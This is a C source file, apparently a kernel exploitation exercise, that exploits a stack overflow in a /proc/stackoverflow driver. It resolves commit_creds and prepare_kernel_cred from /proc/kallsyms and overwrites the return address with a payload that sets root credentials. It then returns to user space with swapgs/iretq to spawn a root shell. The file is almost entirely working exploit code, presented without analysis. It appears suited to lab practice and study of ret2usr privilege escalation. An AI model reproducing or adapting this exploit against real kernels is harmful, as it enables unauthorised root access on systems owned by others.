stack-overflow-exploit-1.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <stdint.h>

#define SIZE 24

typedef int __attribute__((regparm(3))) (*printk_t)(const char *s, ...);
typedef int __attribute__((regparm(3))) (*commit_creds_t)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_t)(unsigned long cred);

printk_t printk;
commit_creds_t commit_creds;
prepare_kernel_cred_t prepare_kernel_cred;

struct trap_frame {
    void *rip;
    unsigned long cs;
    unsigned long rflags;
    void *rsp;
    unsigned long ss;
};
struct trap_frame trap;

void pop_shell(){
    execl("/bin/sh","sh",NULL);
}

/* function finds provided kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;

    return NULL;
}

void ownedit(void) {
    printk("I'm in!");
    commit_creds(prepare_kernel_cred(0));
    asm(
        "movq $trap,%rsp;"
        "swapgs;"
        "iretq;"
    );
}

int main() {

    char buf[SIZE];
    int fd, i;

    memset(buf, 'A', SIZE);

    printk = get_ksym("printk");
    prepare_kernel_cred = get_ksym("prepare_kernel_cred");
    commit_creds = get_ksym("commit_creds");

    trap.rip = &pop_shell;
    asm(
        "movq %cs, %r12;"
        "pushq %r12;"
        "popq trap+8;"  // prepare cs
        "pushfq;"
        "popq trap+16;" // prepare rflags;
        "pushq %rsp;"
        "popq trap+24;" // prepare rsp;
        "movq %ss, %r12;"
        "pushq %r12;"
        "popq trap+32;" // prepare ss
    );

    unsigned long long *ptr = (unsigned long long)&buf[16];
    *ptr = (unsigned long long)&ownedit;

    if((fd = open("/proc/stackoverflow", O_RDWR)) == -1) {
        perror("");
        return -1;
    }
	
    write(fd, buf, sizeof(buf));

    return 0;
}